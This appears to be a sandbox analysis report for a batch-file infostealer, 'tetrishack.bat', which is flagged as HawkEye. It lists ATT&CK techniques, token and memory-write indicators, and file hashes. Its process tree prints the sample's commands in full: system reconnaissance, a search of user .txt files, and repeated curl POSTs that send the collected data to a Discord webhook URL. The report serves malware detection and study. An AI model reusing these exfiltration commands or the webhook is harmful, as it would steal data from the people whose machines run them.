hawkeye | 1ec6ff53075f7232b5d9807e63b82e97a6c7a41bf77cd3b4e3813eefc4f97c50

Analysis

max time kernel
93s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
23/02/2025, 17:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tetrishack.bat
Size

1KB
MD5

729e4888ead4281eaa0644ee732b21e2
SHA1

f3425091a72fb93c0de2c8c0729530263c3a3f05
SHA256

1ec6ff53075f7232b5d9807e63b82e97a6c7a41bf77cd3b4e3813eefc4f97c50
SHA512

59f308be4061bce350e99f9f8bc7d7e9de0ff2a7a660845eaa71abf81a9928e98d78961290dc0fdac93acc913f4cd034488dbb4d5bea2b74cda6502f352d08bf

Score

10^/10

hawkeye keylogger spyware stealer trojan

Malware Config

Signatures

HawkEye
HawkEye is a malware kit that has seen continuous development since at least 2013.
keylogger trojan stealer spyware hawkeye
Hawkeye family
hawkeye
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
32	discord.com
33	discord.com
4	discord.com
28	discord.com
29	discord.com
31	discord.com
5	discord.com
24	discord.com
30	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ifconfig.me

Collects information from the system 1 TTPs 1 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
1220	WMIC.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
5180	timeout.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\img{display:inline-block}#fbpgdg	cmd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5948	whoami.exe
Token: SeIncreaseQuotaPrivilege	1220	WMIC.exe
Token: SeSecurityPrivilege	1220	WMIC.exe
Token: SeTakeOwnershipPrivilege	1220	WMIC.exe
Token: SeLoadDriverPrivilege	1220	WMIC.exe
Token: SeSystemProfilePrivilege	1220	WMIC.exe
Token: SeSystemtimePrivilege	1220	WMIC.exe
Token: SeProfSingleProcessPrivilege	1220	WMIC.exe
Token: SeIncBasePriorityPrivilege	1220	WMIC.exe
Token: SeCreatePagefilePrivilege	1220	WMIC.exe
Token: SeBackupPrivilege	1220	WMIC.exe
Token: SeRestorePrivilege	1220	WMIC.exe
Token: SeShutdownPrivilege	1220	WMIC.exe
Token: SeDebugPrivilege	1220	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1220	WMIC.exe
Token: SeRemoteShutdownPrivilege	1220	WMIC.exe
Token: SeUndockPrivilege	1220	WMIC.exe
Token: SeManageVolumePrivilege	1220	WMIC.exe
Token: 33	1220	WMIC.exe
Token: 34	1220	WMIC.exe
Token: 35	1220	WMIC.exe
Token: 36	1220	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1220	WMIC.exe
Token: SeSecurityPrivilege	1220	WMIC.exe
Token: SeTakeOwnershipPrivilege	1220	WMIC.exe
Token: SeLoadDriverPrivilege	1220	WMIC.exe
Token: SeSystemProfilePrivilege	1220	WMIC.exe
Token: SeSystemtimePrivilege	1220	WMIC.exe
Token: SeProfSingleProcessPrivilege	1220	WMIC.exe
Token: SeIncBasePriorityPrivilege	1220	WMIC.exe
Token: SeCreatePagefilePrivilege	1220	WMIC.exe
Token: SeBackupPrivilege	1220	WMIC.exe
Token: SeRestorePrivilege	1220	WMIC.exe
Token: SeShutdownPrivilege	1220	WMIC.exe
Token: SeDebugPrivilege	1220	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1220	WMIC.exe
Token: SeRemoteShutdownPrivilege	1220	WMIC.exe
Token: SeUndockPrivilege	1220	WMIC.exe
Token: SeManageVolumePrivilege	1220	WMIC.exe
Token: 33	1220	WMIC.exe
Token: 34	1220	WMIC.exe
Token: 35	1220	WMIC.exe
Token: 36	1220	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2816	WMIC.exe
Token: SeSecurityPrivilege	2816	WMIC.exe
Token: SeTakeOwnershipPrivilege	2816	WMIC.exe
Token: SeLoadDriverPrivilege	2816	WMIC.exe
Token: SeSystemProfilePrivilege	2816	WMIC.exe
Token: SeSystemtimePrivilege	2816	WMIC.exe
Token: SeProfSingleProcessPrivilege	2816	WMIC.exe
Token: SeIncBasePriorityPrivilege	2816	WMIC.exe
Token: SeCreatePagefilePrivilege	2816	WMIC.exe
Token: SeBackupPrivilege	2816	WMIC.exe
Token: SeRestorePrivilege	2816	WMIC.exe
Token: SeShutdownPrivilege	2816	WMIC.exe
Token: SeDebugPrivilege	2816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2816	WMIC.exe
Token: SeRemoteShutdownPrivilege	2816	WMIC.exe
Token: SeUndockPrivilege	2816	WMIC.exe
Token: SeManageVolumePrivilege	2816	WMIC.exe
Token: 33	2816	WMIC.exe
Token: 34	2816	WMIC.exe
Token: 35	2816	WMIC.exe
Token: 36	2816	WMIC.exe

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 1048 wrote to memory of 5948	1048	cmd.exe	85
PID 1048 wrote to memory of 5948	1048	cmd.exe	85
PID 1048 wrote to memory of 4568	1048	cmd.exe	86
PID 1048 wrote to memory of 4568	1048	cmd.exe	86
PID 1048 wrote to memory of 1220	1048	cmd.exe	89
PID 1048 wrote to memory of 1220	1048	cmd.exe	89
PID 1048 wrote to memory of 2816	1048	cmd.exe	92
PID 1048 wrote to memory of 2816	1048	cmd.exe	92
PID 1048 wrote to memory of 5000	1048	cmd.exe	94
PID 1048 wrote to memory of 5000	1048	cmd.exe	94
PID 1048 wrote to memory of 5988	1048	cmd.exe	95
PID 1048 wrote to memory of 5988	1048	cmd.exe	95
PID 1048 wrote to memory of 4552	1048	cmd.exe	96
PID 1048 wrote to memory of 4552	1048	cmd.exe	96
PID 1048 wrote to memory of 5180	1048	cmd.exe	97
PID 1048 wrote to memory of 5180	1048	cmd.exe	97
PID 1048 wrote to memory of 5296	1048	cmd.exe	98
PID 1048 wrote to memory of 5296	1048	cmd.exe	98
PID 1048 wrote to memory of 4636	1048	cmd.exe	99
PID 1048 wrote to memory of 4636	1048	cmd.exe	99
PID 1048 wrote to memory of 1612	1048	cmd.exe	100
PID 1048 wrote to memory of 1612	1048	cmd.exe	100
PID 1048 wrote to memory of 2940	1048	cmd.exe	102
PID 1048 wrote to memory of 2940	1048	cmd.exe	102
PID 1048 wrote to memory of 4056	1048	cmd.exe	103
PID 1048 wrote to memory of 4056	1048	cmd.exe	103
PID 1048 wrote to memory of 784	1048	cmd.exe	104
PID 1048 wrote to memory of 784	1048	cmd.exe	104
PID 1048 wrote to memory of 3288	1048	cmd.exe	105
PID 1048 wrote to memory of 3288	1048	cmd.exe	105
PID 1048 wrote to memory of 3100	1048	cmd.exe	106
PID 1048 wrote to memory of 3100	1048	cmd.exe	106
PID 1048 wrote to memory of 2384	1048	cmd.exe	107
PID 1048 wrote to memory of 2384	1048	cmd.exe	107
PID 1048 wrote to memory of 5104	1048	cmd.exe	108
PID 1048 wrote to memory of 5104	1048	cmd.exe	108
PID 1048 wrote to memory of 3528	1048	cmd.exe	109
PID 1048 wrote to memory of 3528	1048	cmd.exe	109
PID 1048 wrote to memory of 4472	1048	cmd.exe	110
PID 1048 wrote to memory of 4472	1048	cmd.exe	110
PID 1048 wrote to memory of 5108	1048	cmd.exe	111
PID 1048 wrote to memory of 5108	1048	cmd.exe	111
PID 1048 wrote to memory of 5716	1048	cmd.exe	112
PID 1048 wrote to memory of 5716	1048	cmd.exe	112
PID 1048 wrote to memory of 4052	1048	cmd.exe	113
PID 1048 wrote to memory of 4052	1048	cmd.exe	113
PID 1048 wrote to memory of 6136	1048	cmd.exe	114
PID 1048 wrote to memory of 6136	1048	cmd.exe	114
PID 1048 wrote to memory of 3552	1048	cmd.exe	115
PID 1048 wrote to memory of 3552	1048	cmd.exe	115
PID 1048 wrote to memory of 1944	1048	cmd.exe	116
PID 1048 wrote to memory of 1944	1048	cmd.exe	116
PID 1048 wrote to memory of 5056	1048	cmd.exe	117
PID 1048 wrote to memory of 5056	1048	cmd.exe	117

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tetrishack.bat"
1⤵
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:1048
- C:\Windows\system32\whoami.exe
  whoami
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5948
- C:\Windows\system32\curl.exe
  curl -s ifconfig.me
  2⤵
  PID:4568
- C:\Windows\System32\Wbem\WMIC.exe
  wmic logicaldisk get caption
  2⤵
  - Collects information from the system
  - Suspicious use of AdjustPrivilegeToken
  PID:1220
- C:\Windows\System32\Wbem\WMIC.exe
  wmic cpu get name
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2816
- C:\Windows\System32\Wbem\WMIC.exe
  wmic memorychip get capacity
  2⤵
  PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Temp\sysinfo.txt"
  2⤵
  PID:5988
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"crywluvt\admin\nIP: \n212.102.63.147Drives: \nCN\nMicrosoft Windows [Version 10.0.19041.1288]\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:4552
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c dir /b /s /a-d "C:\Users\Admin\*.txt" 2>nul
  2⤵
  PID:5296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt"
  2⤵
  PID:4636
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt\n78\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:1612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt"
  2⤵
  PID:2940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ThirdPartyNotices.txt"
  2⤵
  PID:4056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PJEUONK8\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_10[1].txt"
  2⤵
  PID:784
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PJEUONK8\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_10[1].txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:3288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PJEUONK8\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_11[1].txt"
  2⤵
  PID:3100
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PJEUONK8\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_11[1].txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:2384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PJEUONK8\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_12[1].txt"
  2⤵
  PID:5104
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PJEUONK8\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_12[1].txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:3528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PJEUONK8\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_13[1].txt"
  2⤵
  PID:4472
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PJEUONK8\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_13[1].txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:5108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PJEUONK8\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_14[1].txt"
  2⤵
  PID:5716
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PJEUONK8\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_14[1].txt\n∩╗┐body #fbpgdg{color:#000;font-family:'Segoe UI',Arial,Helvetica,Sans-Serif;font-style:normal;font-variant:normal;font-weight:normal;background-position:inherit;display:initial;cursor:pointer;line-height:15px}body{position:static}body[dir]{margin:0}#fbpgdg,#fbpgdg *{box-sizing:content-box}#fbpgdg h2{font-weight:bold;-webkit-margin-before:.83em;-webkit-margin-after:.83em;font-size:1.3em;line-height:15px}body[dir] #fbpgdg h2{margin:10px 0 10px 0}#fbpgdg h3{font-weight:bold;font-size:1.17em;display:block}#fbpgdg .fb-t-small{font-size:13px}#fbpgdg .fbctgcntsdk,#fbpgdg .container{-webkit-margin-after:0}body[dir] #fbpgdg .fbctgcntsdk,body[dir] #fbpgdg .container{margin-bottom:0;margin-top:10px}body[dir='ltr'] #fbpgdg .fbctgcntsdk,body[dir='ltr'] #fbpgdg .container{padding-left:0}body[dir='rtl'] #fbpgdg .fbctgcntsdk,body[dir='rtl'] #fbpgdg .container{padding-right:0}#fbpgdg .fbctgctlsdk{list-style:none;display:list-item}body[dir] #fbpgdg .fbctgctlsdk{margin:10px 0 10px 0}#fbpgdg a{text-decoration:none;color:#005a9e}#fbpgdg .fbctgctlsdk a,#fbpgdg div;vertical-align:middle;text-decoration:none;display:block}body[dir] #fbpgdg .fbctgctlsdk a,body[dir] #fbpgdg div 0 9px 0}#fbpgdg label{display:inline;color:#000}body[dir] #fbpgdg label{margin-bottom:5px;padding-bottom:0}body[dir='ltr'] #fbpgdg label{margin-left:5px}body[dir='rtl'] #fbpgdg label{margin-right:5px}#fbpgdg p :not(input){font-size:13px}#fbpgdg .fbctgctlsdk label{cursor:pointer}body[dir] #fbpgdg .fbctgctlsdk label{margin:0 5px 0 5px}body[dir='ltr'] #fbpgdg .fbctgctlsdk label{padding-right:5px}body[dir='rtl'] #fbpgdg .fbctgctlsdk label{padding-left:5px}#fbpgdg p{-webkit-margin-before:5px;-webkit-margin-after:5px}body[dir] #fbpgdg p{margin-top:5px;margin-bottom:5px}#fbpgdg input[type="checkbox"],#fbpgdg input[type="radio"]{position:relative;vertical-align:middle;top:-1px;border:1px solid #ccc;box-sizing:border-box;cursor:default;height:15px;width:15px;-webkit-appearance:none}body[dir] #fbpgdg input[type="checkbox"]{margin:0}body[dir] #fbpgdg .fb-mrg-med{margin-top:10px 10px 500}#fbpgdg input[type="checkbox"]:checked::after,#fbpgdg input[type="radio"]:checked::after{position:relative;background:#0c8484;content:'';display:block;height:7px;width:7px;top:3px}body[dir='ltr'] #fbpgdg input[type="checkbox"]:checked::after,body[dir='ltr'] #fbpgdg input[type="radio"]:checked::after{left:3px}body[dir='rtl'] #fbpgdg input[type="checkbox"]:checked::after,body[dir='rtl'] #fbpgdg input[type="radio"]:checked::after{right:3px}#fbpgdg input[type="radio"]:checked::after{border-radius:501001px solid #ccc;line-height:inherit;font-size:inherit;box-sizing:border-box;font:inherit;color:#000;height:inherit}body[dir] #fbpgdg input[type="text"]{padding:5px;margin:0}#fbpgdg textarea{width:100border-box;overflow:auto;height:83px;font:inherit;resize:vertical;color:#000;border:1px solid #ccc}body[dir] #fbpgdg textarea{padding:5px}body[dir='ltr'] #fbpgdg textarea{margin-right:10px}body[dir='rtl'] #fbpgdg textarea{margin-left:10px}#fbpgdg ::-webkit-input-placeholder{color:#767676}#fbpgdg :-moz-placeholder{color:#767676;opacity:1}#fbpgdg ::-moz-placeholder{color:#767676;opacity:1}#fbpgdg :-ms-input-placeholder{color:#767676}#fbpgdg textarea.active,#fbpgdg input[type="text"].active{color:#000}#fbpgdg textarea.error,#fbpgdg input[type="text"].error{border:1px solid #c00;outline-style:none}body[dir] #fbpgdg h3{margin-top:0;margin-bottom:0}.modal{position:fixed;top:50320px;transform:translateY(-50#fff;box-shadow:0 4px 16px black;box-shadow:0 4px 16px rgba(0,0,0,.2);z-index:1000002;overflow-y:auto;max-height:1005px}body[dir='ltr'] .modal{left:50-180px;padding-left:20px;padding-right:20px}body[dir='rtl'] .modal{right:50-180px;padding-right:20px;padding-left:20px}.modal;cursor:default;position:fixed;top:0;background-color:rgba(0,0,0,.2);min-width:355px;z-index:999999}body[dir='ltr'] .modalShield{left:0;right:0}body[dir='rtl'] .modalShield{right:0;left:0}#fbpgdg .moveable{cursor:move}#fbpgdg .padding{height:5px}#fbpgdg .button{background-color:#ccc;border:0;width:152px;display:inline-block;text-align:center;font-size:inherit;height:36px;-webkit-margin-before:0}body[dir] #fbpgdg .button{padding:0;margin:5px 0 10px 0}#fbpgdg .button a{color:#000;border:1px solid #ccc;background-color:#ccc}#fbpgdg .button;vertical-align:middle;text-decoration:none;border:1px solid #ccc;box-sizing:border-box;color:#000;font-size:inherit;line-height:inherit;width:10010px 0 9px 0}#fbpgdg .button:first-Child{background-color:#005a9e;border:0}body[dir='ltr'] #fbpgdg .button:first-Child{margin-right:15px}body[dir='rtl'] #fbpgdg .button:first-Child{margin-left:15px}#fbpgdg .button:first-Child a,#fbpgdg .button:first-Child input{color:#fff;background-color:#005a9e;border:1px solid #005a9e}#fbpgdg .button.inactive{background-color:#ccc}#fbpgdg .inline{display:list-item}#fbpgdg .step2{display:none}#fbpgdgsp{position:absolute;bottom:0;top:0;background:#000;filter:alpha(opacity=75);opacity:.75;display:none}body[dir='ltr'] #fbpgdgsp{left:0;right:0}body[dir='rtl'] #fbpgdgsp{right:0;left:0}#fbpgdgsp;top:45#fff;text-align:center}body[dir='ltr'] #fbpgdgsp;right:0}body[dir='rtl'] #fbpgdgsp;left:0}#fbpgdgsp a#fbpgdgclbt{display:none}#feedback-screenshot{display:none;visibility:hidden}@media only screen and (min-width:275px) and (min-width:275px) and (max-device-width:600px),(min-width:275px) and (max-width:600px),(min-width:275px) and (max-device-height:420px),(min-width:275px) and (max-height:420px){#fbpgdg .button{width:calc(500;transform:none;width:calc(1000}body[dir='ltr'] .modal{left:0;margin-left:0}body[dir='rtl'] .modal{right:0;margin-right:0}body[dir] #fbpgdg .fbctgcntsdk{margin-top:5px}#fbpgdg h2{font-weight:bold;-webkit-margin-before:5px;-webkit-margin-after:0;font-size:1.3em;line-height:15px}body[dir] #fbpgdg h2{margin-bottom:0}}@media only screen and (min-width:275px) and (max-device-width:355px),(min-width:275px) and (max-width:355px){body[dir] #fbpgdg .button{margin:0 0 10px 0}body[dir] #fbpgdg .fb-mrg-med{margin-top:5px 5px 275px) and (max-device-height:420px),(min-width:275px) and (max-height:420px){#fbpgdg .inline{display:inline-block;*display:inline;zoom:1}body[dir] #fbpgdg .button{margin:0 0 5px 0}body[dir] #fbpgdg .fb-mrg-med{margin-top:5px 5px 62.25px}#fbpgdg p{-webkit-margin-after:5px;-webkit-margin-before:5px}.modalShield{background-color:#fff}}@media only screen and (min-width:275px) and (max-device-height:240px),(min-width:275px) and (max-height:240px){#fbpgdg textarea{height:28px}#fbpgdg h2{font-weight:bold;-webkit-margin-before:5px;-webkit-margin-after:0;font-size:1.3em;line-height:10px}body[dir] #fbpgdg h2{margin-bottom:0}#fbpgdgpnlrp{display:none}body[dir] #fbpgdg .container{margin-top:5px}}@media screen and (-ms-high-contrast:active){#fbpgdg{border:2px solid windowText}#fbpgdg input[type=submit],#fbpgdg input[type=button],#fbpgdg :first-child.button input{color:buttonText;border:2px solid buttonText}#fbpgdg input[type=submit]:hover,#fbpgdg input[type=button]:hover{color:highlight;border-color:highlight}}\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:4052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PJEUONK8\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_15[1].txt"
  2⤵
  PID:6136
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PJEUONK8\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_15[1].txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:3552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PJEUONK8\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_16[1].txt"
  2⤵
  PID:1944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PJEUONK8\1\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_17[1].txt"
  2⤵
  PID:5056

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\loot.bat

Filesize
6KB

MD5
35ea155c301804403cbe22f0cf00772d

SHA1
ba61bf3f618726d1ea7cd36f6d9b02f0ec1b1f57

SHA256
5f4becf8081530548d4bf19e9fd75d7d330338f8138f0ef8930775abd94f0506

SHA512
4d5952aca9857b844055d41b3f679f3e4375577400f7aeb8c0748001bc861a98496608bbdbf634ec06c91e72f1de4f6ef0502e741a6b2b0670f3fae85f6c8b22

Download Submit
C:\Users\Admin\AppData\Local\Temp\loot.bat

Filesize
395B

MD5
127edb8f1c747266fd7b570613486c68

SHA1
ceb3dbc33c2616ccb2fbef306216a9638e3b1d4d

SHA256
409e97caf7585ddcf0d5e1fa9fd190a6030bd9887e7eb83f21a5a843a92174d8

SHA512
b216ccba726a9f7008dd7d99b74c750134a8287ccdc275a7996ef210bdbe8a1ab7baec1602e1fef1dd4f117ad04812cb714fa729fc1f38dc212ec5b3fddbafff

Download Submit
C:\Users\Admin\AppData\Local\Temp\loot.bat

Filesize
395B

MD5
d0b45d2628991415bb352fcd7888e3c9

SHA1
1fc7d4e763e631fd7c708541e87e5a3bdd858ab3

SHA256
89df7fa3fefef2341b754956ef39e63004c957c0e72e90bb3276a620e5569e90

SHA512
e48dc3159424c4552659cf09bdffd9632151562597237f4f1e31607bbc62183dbc2e939b41cd35c567c4508c4262ad18789caf7b89475468f5254b9fde669db2

Download Submit
C:\Users\Admin\AppData\Local\Temp\loot.bat

Filesize
289B

MD5
3c3af2fc4a6edb8b28eb4abdb49f1bcb

SHA1
6fe4e3ab8f1bedf92d25531f8fc9c30eb67280e8

SHA256
200cf2ae460ca7de599717de69c3151d92c7df65d54e0c1fda3054d2709a8116

SHA512
4a956adfe3d132ada8df619fc6402ceb59e9f9fac525f36b3355eaac7e85e18c403668da1951a981eb0bb904a06a52df188f2cd3bab77ae03c44541c9cafebb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\loot.bat

Filesize
395B

MD5
b0b397d87e4f1386ab0a76b026b3d44e

SHA1
44c48801dd0a749f2074284c0d0bc75d272c6d0d

SHA256
32a7f8a49b855fceb272430ff3668511376cdfbedc8c5e12d11b7c360bec2882

SHA512
ebf57c89c724ae08efaabdd988d8821c92e9e481f5722c7a06d338b1a920f59fdd4cd411e09892aaf92f9fae27a4d017e5f29fa8881e6814688d78fd536fe38b

Download Submit
C:\Users\Admin\AppData\Local\Temp\loot.bat

Filesize
293B

MD5
84e892b593c46da361d16c1f73eb8302

SHA1
7849a7abc5b6b0eef05853340d58d211d0ec83e2

SHA256
dc9bea70d652e7a3892c305986e5f36f45e1c5f8e8b1ed8755bb8704b6487a87

SHA512
7e2de91e007aaea104cc244212e1dc1179d70226bbfdbfb8ccbd3555dae26976d565985e0246465984ef041fef84371399af41b622afa4b201e706c0ba1b764c

Download Submit
C:\Users\Admin\AppData\Local\Temp\loot.bat

Filesize
395B

MD5
6697c89ec2a29f433c2407d1f4c27408

SHA1
23bd959adf897fc2e6bcaa86aa27148e9c3a883d

SHA256
9cf044d8bc5a158da9ce12fac91c32ecb9e7b82c9da48752bcb42beddbaf0ea6

SHA512
8b42ce0f1e6508c79482879416fb113caa13becaa8768b1e28f1b3c481a99217e209e812c215de60a7d2e402ec825bff7adce9116ffb6ced8b5807e7d4cee1dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\loot.bat

Filesize
7KB

MD5
e8e573bae465d120e44f72662a5f109e

SHA1
1d3cd3325a5ba113b3eee43a075f461f60f4c01a

SHA256
1289fead67bdaf72b24d818cde48e76821c6ee70c279b7654ad777bd9ca9670a

SHA512
a4925ed3d66edb218b41574e232669665aeee4c6848cdcf7115ee9fa62bc903a2ac1c72c6c0c4d395c28d28ac22ff221bb20b86715aed09a334746674beb0e49

Download Submit
C:\Users\Admin\AppData\Local\Temp\loot.bat

Filesize
395B

MD5
e9a15cd779d60fadeb1803460e0aaf00

SHA1
211d4e8ce858ac03f14be0eb2514a0b1e35142b4

SHA256
7ae32545f56cc455bb4fe3ec0bca7f046b619f1785128e0c0e36b4af6cfc4209

SHA512
7f0816ad29253c1eba581915bb327c8324485c0d6474a24d16089321f95474aa728cc023f58def0b2769211d0cb2704399b77b685139b9749af7778834224bb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\loot.bat

Filesize
5KB

MD5
d36d44d3553bff2494ce34e678cb60fe

SHA1
c46054da01564c40cf756d868f4f87fd9e4868dc

SHA256
5779222bbc863f0ad21f4d36df4942cd53cfb562a4441afda8ffcd58e01daf7d

SHA512
e2e5e615198e76b3553d539db3fcb3634f04e63e3d6e0153fd242a2c41386864ebf31ea19cd744a085fd4e64ce0963579f5c334fb122177022c470c87d632fb7

Download Submit
C:\Users\Admin\AppData\Local\Temp\sysinfo.txt

Filesize
349B

MD5
4b3fd3158925bd8829fa2069807a9c32

SHA1
